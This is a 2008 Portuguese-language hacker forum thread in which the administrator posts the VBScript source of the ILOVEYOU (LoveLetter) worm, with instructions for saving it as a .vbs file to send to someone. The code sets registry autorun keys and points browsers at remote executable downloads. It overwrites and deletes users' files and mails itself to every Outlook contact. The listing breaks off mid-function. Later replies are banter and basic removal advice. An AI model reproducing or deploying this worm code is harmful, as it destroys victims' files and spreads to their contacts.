| Um Novo Jeito de Aprender |

FórumPortalRegistrar-seLogin
TnT Hacker :: Virus e compania. :: Vírus
 

codigo fonte do virus

Ver o tópico anterior Ver o tópico seguinte Ir em baixo 
Ir à página : 1, 2  Seguinte
AutorMensagem
Admin
Administrador
Administrador


Sexo:Masculino
Idade : 19
Registrado dia : 14 Abr 2008
Mensagens : 268
Localização : Nova Friburgo
WARNING DE RESPEITO AS REGRAS : http://i34.servimg.com/u/f34/11/14/55/92/111010.png

MensagemAssunto: codigo fonte do virus   Sex Maio 16, 2008 4:40 am
Breve Resumo
Citação:
O vírus I Love You foi mundialmente comentado nas
últimas semanas. Foi praticamente impossível ligar a televisão e não
ver os telejornais falando sobre esse vírus e os terríveis estragos
provocados por ele.

Mas porque tantas pessoas pegaram esse vírus? Simplesmente porque muita
gente sai abrindo arquivos que vêm anexados a mensagens sem antes
passar um anti-vírus neles! Alguns programas de e-mail possuem uma
opção para abrir automaticamente qualquer arquivo que venha anexado a
uma mensagem. E se esse arquivo contiver um vírus?

Dessa forma, a grande lição é: não abra arquivos anexados a mensagens
sem antes passar um anti-vírus, mesmo que essa mensagem tenha vindo de
uma pessoa conhecida! Se o seu programa tem a opção de abrir arquivos
anexados automaticamente, desabilite essa opção!

Vírus em forma de arquivos anexados a e-mails não são uma novidade. O
caso mais famoso antes do I Love You foi o Happy99, que, quando era
executado, fazia um festival de fogos de artifício em seu micro,
enquanto ficava mandando uma cópia de si próprio para todos os e-mails
cadastrados em sua lista de endereços, igualzinho ao que acontece
quando você tem o vírus I Love You em seu micro. A diferença é que o
Happy99 não bagunçava os dados de seu micro.

O vírus I Love You só existe por uma mania que a Microsoft tem de
tentar facilitar o trabalho do usuário e, por outro lado, abrir uma
brecha de segurança que possibilita a criação de vírus. Só para
recordar, os vírus de macro e a falha de segurança do ActiveX do
Internet Explorer são bons exemplos do que estamos falando. Os vírus de
macro aproveitam-se do recurso de macro que o Word, o Excel e o Access
têm para serem executados. Já o ActiveX, componente do browser Internet
Explorer, permite que sites possam mandar comandos agressivos para o
seu micro, como até mesmo o desligamento total de sua máquina! Tanto
que o browser da Microsoft for informalmente apelidado de "Internet
Exploder" quando foi lançado. Esse problema foi "corrigido" a partir do
Internet Explorer 4, que passou a mostrar uma mensagem informando que o
site está tentando mandar um comando agressivo e pergunta se você
deseja aceitar o comando ou não (no site http://www.enemy.org
há o exemplo dessa falha de segurança; esse site, dos odiadores de Bill
Gates, manda um comando de desligamento da máquina caso você a acesse
usando o Internet Explorer).

O vírus I Love You é um script escrito em Vbs (Visual Basic script) e
só há como executá-lo se você tiver o Internet Explorer instalado em
sua máquina. Infelizmente no Windows 98 o Internet Explorer faz parte
do sistema e muito provavelmente você tem esse programa instalado na
sua máquina, mesmo que não faça uso dele. A disseminação do vírus a
partir de sua máquina só é possível se você usar o programa de e-mail
Outlook.

Quando entra em ação, o vírus bagunça os arquivos de seu micro, além de
tentar enviar uma cópia de si próprio para todas as pessoas presentes
em sua lista de endereços, caso você use o Outlook.

A maioria dos antivírus já tem atualização para reconhecer e remover o
I Love You, bem como suas variações. Um desses anti-vírus é o F-prot,
que pode ser baixado em http://www.complex.is/f-prot/Download.html

Em tempo: quem quiser saber como o I Love You funciona, visitehttp://www.datafellows.com/v-descs/love.htm e http://www.complex.is/f-prot/love.html






Esse é para os curiósos

Para quem quiser mandar esse vírus para alguem é so colar o código no bloco de notas >
salvar como iloveyou.vbs.
Atenção o nome iloveyou pode mudar so a extençãio que não ou seja .vbs

Este e o codigo fonte do virus "I love you" ele esta em VBS postei este codigo aqui para estudo.

O virus I love you foi o 4º maior de 2000, ele infectou rapidamente milhoes de usuarios em toda a internet.


Código:
rem barok -loveletter(vbe)
rem by: spyder / ispyder@mail.com / @GRAMMERSoft Group /
Manila,Philippines
On Error Resume Next
dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,d ow
eq=""
ctr=0
Set fso = CreateObject("scripting.FileSystemObject")
set file = fso.OpenTextFile(Wscript.scriptFullname,1)
vbscopy=file.ReadAll
main()
sub main()
On Error Resume Next
dim wscr,rr
set wscr=CreateObject("Wscript.Shell")
rr=wscr.RegRead("HKEY_CURRENT_USER\Software\Micros oft\Windows scripting
Host\Settings\Timeout")
if (rr>=1) then
wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows scripting
Host\Settings\Timeout",0,"REG_DWORD"
end if
Set dirwin = fso.GetSpecialFolder(0)
Set dirsystem = fso.GetSpecialFolder(1)
Set dirtemp = fso.GetSpecialFolder(2)
Set c = fso.GetFile(Wscript.scriptFullName)
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
regruns()
html()
spreadtoemail()
listadriv()
end sub
sub regruns()
On Error Resume Next
Dim num,downread
regcreate
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Cur rentVersion\Run\MSKernel32
",dirsystem&"\MSKernel32.vbs"
regcreate
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Cur rentVersion\RunServices\Wi
n32DLL",dirwin&"\Win32DLL.vbs"
downread=""
downread=regget("HKEY_CURRENT_USER\Software\Micros oft\Internet
Explorer\Download Directory")
if (downread="") then
downread="c:\"
end if
if (fileexist(dirsystem&"\WinFAT32.exe")=1) then
Randomize
num = Int((4 * Rnd) + 1)
if num = 1 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start
Page","http://www.skyinet.net/~young1s/HJKhjnwerhjkxcvytwertnMTFwetrdsfmhPnj
w6587345gvsdf7679njbvYT/WIN-BUGSFIX.exe"
elseif num = 2 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start
Page","http://www.skyinet.net/~angelcat/skladjflfdjghKJnwetryDGFikjUIyqwerWe
546786324hjk4jnHHGbvbmKLJKjhkqj4w/WIN-BUGSFIX.exe"
elseif num = 3 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start
Page","http://www.skyinet.net/~koichi/jf6TRjkcbGRpGqaq198vbFV5hfFEkbopBdQZnm
POhfgER67b3Vbvg/WIN-BUGSFIX.exe"
elseif num = 4 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start
Page","http://www.skyinet.net/~chu/sdgfhjksdfjklNBmnfgkKLHjkqwtuHJBhAFSDGjkh
YUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237 461234iuy7thjg/WIN-BUGSFIX
.exe"
end if
end if
if (fileexist(downread&"\WIN-BUGSFIX.exe")=0) then
regcreate
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Cur rentVersion\Run\WIN-BUGSFI
X",downread&"\WIN-BUGSFIX.exe"
regcreate "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start
Page","about:blank"
end if
end sub
sub listadriv
On Error Resume Next
Dim d,dc,s
Set dc = fso.Drives
For Each d in dc
If d.DriveType = 2 or d.DriveType=3 Then
folderlist(d.path&"\")
end if
Next
listadriv = s
end sub
sub infectfiles(folderspec)
On Error Resume Next
dim f,f1,fc,ext,ap,mircfname,s,bname,mp3
set f = fso.GetFolder(folderspec)
set fc = f.Files
for each f1 in fc
ext=fso.GetExtensionName(f1.path)
ext=lcase(ext)
s=lcase(f1.name)
if (ext="vbs") or (ext="vbe") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
elseif(ext="js") or (ext="jse") or (ext="css") or (ext="wsh") or (ext="sct")
or (ext="hta") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
bname=fso.GetBaseName(f1.path)
set cop=fso.GetFile(f1.path)
cop.copy(folderspec&"\"&bname&".vbs")
fso.DeleteFile(f1.path)
elseif(ext="jpg") or (ext="jpeg") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
set cop=fso.GetFile(f1.path)
cop.copy(f1.path&".vbs")
fso.DeleteFile(f1.path)
elseif(ext="mp3") or (ext="mp2") then
set mp3=fso.CreateTextFile(f1.path&".vbs")
mp3.write vbscopy
mp3.close
set att=fso.GetFile(f1.path)
att.attributes=att.attributes+2
end if
if (eq<>folderspec) then
if (s="mirc32.exe") or (s="mlink32.exe") or (s="mirc.ini") or
(s="script.ini") or (s="mirc.hlp") then
set scriptini=fso.CreateTextFile(folderspec&"\script.i ni")
scriptini.WriteLine "[script]"
scriptini.WriteLine ";mIRC script"
scriptini.WriteLine "; Please dont edit this script... mIRC will corrupt,
if mIRC will"
scriptini.WriteLine " corrupt... WINDOWS will affect and will not run
correctly. thanks"
scriptini.WriteLine ";"
scriptini.WriteLine ";Khaled Mardam-Bey"
scriptini.WriteLine ";http://www.mirc.com"
scriptini.WriteLine ";"
scriptini.WriteLine "n0=on 1:JOIN:#:{"
scriptini.WriteLine "n1= /if ( $nick == $me ) { halt }"
scriptini.WriteLine "n2= /.dcc send $nick
"&dirsystem&"\LOVE-LETTER-FOR-YOU.HTM"
scriptini.WriteLine "n3=}"
scriptini.close
eq=folderspec
end if
end if
next
end sub
sub folderlist(folderspec)
On Error Resume Next
dim f,f1,sf
set f = fso.GetFolder(folderspec)
set sf = f.SubFolders
for each f1 in sf
infectfiles(f1.path)
folderlist(f1.path)
next
end sub
sub regcreate(regkey,regvalue)
Set regedit = CreateObject("Wscript.Shell")
regedit.RegWrite regkey,regvalue
end sub
function regget(value)
Set regedit = CreateObject("Wscript.Shell")
regget=regedit.RegRead(value)
end function
function fileexist(filespec)
On Error Resume Next
dim msg
if (fso.FileExists(filespec)) Then
msg = 0
else
msg = 1
end if
fileexist = msg
end function
function folderexist(folderspec)
On Error Resume Next
dim msg
if (fso.GetFolderExists(folderspec)) then
msg = 0
else
msg = 1
end if
fileexist = msg
end function
sub spreadtoemail()
On Error Resume Next
dim x,a,ctrlists,ctrentries,malead,b,regedit,regv,rega d
set regedit=CreateObject("Wscript.Shell")
set out=Wscript.CreateObject("Outlook.Application")
set mapi=out.GetNameSpace("MAPI")
for ctrlists=1 to mapi.AddressLists.Count
set a=mapi.AddressLists(ctrlists)
x=1
regv=regedit.RegRead("HKEY_CURRENT_USER\Software\M icrosoft\WAB\"&a)
if (regv="") then
regv=1
end if
if (int(a.AddressEntries.Count)>int(regv)) then
for ctrentries=1 to a.AddressEntries.Count
malead=a.AddressEntries(x)
regad=""
regad=regedit.RegRead("HKEY_CURRENT_USER\Software\ Microsoft\WAB\"&malead)
if (regad="") then
set male=out.CreateItem(0)
male.Recipients.Add(malead)
male.Subject = "ILOVEYOU"
male.Body = vbcrlf&"kindly check the attached LOVELETTER coming from me."
male.Attachments.Add(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
male.Send
regedit.RegWrite
"HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead ,1,"REG_DWORD"
end if
x=x+1
next
regedit.RegWrite
"HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.Ad dressEntries.Count
else
regedit.RegWrite
"HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.Ad dressEntries.Count
end if
next
Set out=Nothing
Set mapi=Nothing
end sub
sub html
On Error Resume Next
dim lines,n,dta1,dta2,dt1,dt2,dt3,dt4,l1,dt5,dt6
dta1="

_________________
O Seu Administrador

Última edição por Admin dia Qua Jun 25, 2008 9:46 pm, editado 2 vezes
Voltar ao Topo Ir em baixo
Retalhador



Sexo:Masculino
Idade : 17
Registrado dia : 25 Jun 2008
Mensagens : 3
Localização : brazil
WARNING DE RESPEITO AS REGRAS : http://i34.servimg.com/u/f34/11/14/55/92/111010.png

MensagemAssunto: Re: codigo fonte do virus   Qua Jun 25, 2008 6:56 pm
muito fraco ele!!!

ashuashuahs!!!

só pra saber... o que ele faz com o Pc da vítima... pois eu nao pego Vírus...
Voltar ao Topo Ir em baixo
Admin
Administrador
Administrador


Sexo:Masculino
Idade : 19
Registrado dia : 14 Abr 2008
Mensagens : 268
Localização : Nova Friburgo
WARNING DE RESPEITO AS REGRAS : http://i34.servimg.com/u/f34/11/14/55/92/111010.png

MensagemAssunto: Re: codigo fonte do virus   Qua Jun 25, 2008 9:34 pm
Retalhador escreveu:
muito fraco ele!!!

ashuashuahs!!!

só pra saber... o que ele faz com o Pc da vítima... pois eu nao pego Vírus...


Fraco?

Você não sabe o que essa coisinha fraca pode fazer.
Espero que você não tenha executado "o fraco"
Ele faz um festival em seu computador bagunça tudo mais tudo mesmo
ele só pode ser executado se você tiver o Internet Explorer em seu computador
ele é escrito em VBS. Alem de bagunçar tudo ainda manda uma cópia dele para contatos de e-mail do outlook.
Ah aí eu digo meu antivírus nem pego essa merdinha.
Ta não pego mais espero que não tenha executado pois se executou, em pouco tempo seu pc vai estar um aue!
não venha me culpar no post ja dizia que era vírus.
_________________
O Seu Administrador
Voltar ao Topo Ir em baixo
Admin¹
Administrador
Administrador


Sexo:Masculino
Idade : 20
Registrado dia : 16 Maio 2008
Mensagens : 623
WARNING DE RESPEITO AS REGRAS : http://i34.servimg.com/u/f34/11/14/55/92/111010.png

MensagemAssunto: Re: codigo fonte do virus   Qui Jun 26, 2008 8:16 pm
Ótimo!
_________________
Reeemax

Participe de nossa comunidade;

http://www.orkut.com/Community.aspx?cmm=52250210
Voltar ao Topo Ir em baixo
Jonako
Level 2
Level 2


Sexo:Masculino
Idade : 27
Registrado dia : 13 Jun 2008
Mensagens : 18
Localização : sp
WARNING DE RESPEITO AS REGRAS : http://i34.servimg.com/u/f34/11/14/55/92/111010.png

MensagemAssunto: Re: codigo fonte do virus   Sab Jun 28, 2008 10:33 pm
Bom, Estou com um Virus no meu PC e a merda do avast nao elimina. so fala o diretorio mais nao elimina, Queria sabre de vcs que são bem mais manjados no assunto Oque eu devo fazer pra remover essa praga, um programa ou seila me ajudem porfavor.
Voltar ao Topo Ir em baixo
Admin¹
Administrador
Administrador


Sexo:Masculino
Idade : 20
Registrado dia : 16 Maio 2008
Mensagens : 623
WARNING DE RESPEITO AS REGRAS : http://i34.servimg.com/u/f34/11/14/55/92/111010.png

MensagemAssunto: Re: codigo fonte do virus   Sab Jun 28, 2008 10:46 pm
Cara.

Que tipo de viirus é?!

Obrigado.
_________________
Reeemax

Participe de nossa comunidade;

http://www.orkut.com/Community.aspx?cmm=52250210
Voltar ao Topo Ir em baixo
Jonako
Level 2
Level 2


Sexo:Masculino
Idade : 27
Registrado dia : 13 Jun 2008
Mensagens : 18
Localização : sp
WARNING DE RESPEITO AS REGRAS : http://i34.servimg.com/u/f34/11/14/55/92/111010.png

MensagemAssunto: Re: codigo fonte do virus   Sab Jun 28, 2008 10:50 pm
Mano nao sei não. Ele se encontra no win32 acho que eh dll nao tenhu certeza me ajuda porfavor
Voltar ao Topo Ir em baixo
Admin¹
Administrador
Administrador


Sexo:Masculino
Idade : 20
Registrado dia : 16 Maio 2008
Mensagens : 623
WARNING DE RESPEITO AS REGRAS : http://i34.servimg.com/u/f34/11/14/55/92/111010.png

MensagemAssunto: Re: codigo fonte do virus   Dom Jun 29, 2008 12:35 am
Brother.

O jeito mais facil seria vc formatar.

Já que não sabe qual é o viirus.

Mais, para que não perca seus dados.

Tenta entrar nessa pasta e excluir manualmente esse virus.

Ou faça download do AVIRA [ anti virus ]

Ele tem a capacidade de deletar o viirus.

Obrigado.
_________________
Reeemax

Participe de nossa comunidade;

http://www.orkut.com/Community.aspx?cmm=52250210
Voltar ao Topo Ir em baixo
Jonako
Level 2
Level 2


Sexo:Masculino
Idade : 27
Registrado dia : 13 Jun 2008
Mensagens : 18
Localização : sp
WARNING DE RESPEITO AS REGRAS : http://i34.servimg.com/u/f34/11/14/55/92/111010.png

MensagemAssunto: Re: codigo fonte do virus   Dom Jun 29, 2008 4:40 pm
Fmz vlw.
Vou formatar msm.
(o avira é um lixao, ele reconhece que eh virus mais nao elimina, coloco eliminar mais nao ellimina.)

voce pode postar como que eu formato o PC certinhu
Voltar ao Topo Ir em baixo
Admin¹
Administrador
Administrador


Sexo:Masculino
Idade : 20
Registrado dia : 16 Maio 2008
Mensagens : 623
WARNING DE RESPEITO AS REGRAS : http://i34.servimg.com/u/f34/11/14/55/92/111010.png

MensagemAssunto: Re: codigo fonte do virus   Dom Jun 29, 2008 6:10 pm
Broother.

Você tem que ter o CD de foormatação.
_________________
Reeemax

Participe de nossa comunidade;

http://www.orkut.com/Community.aspx?cmm=52250210
Voltar ao Topo Ir em baixo

codigo fonte do virus

Ver o tópico anterior Ver o tópico seguinte Voltar ao Topo 
Página 1 de 2Ir à página : 1, 2  Seguinte

Permissão deste fórum:Você não pode responder aos tópicos neste fórum
TnT Hacker :: Virus e compania. :: Vírus-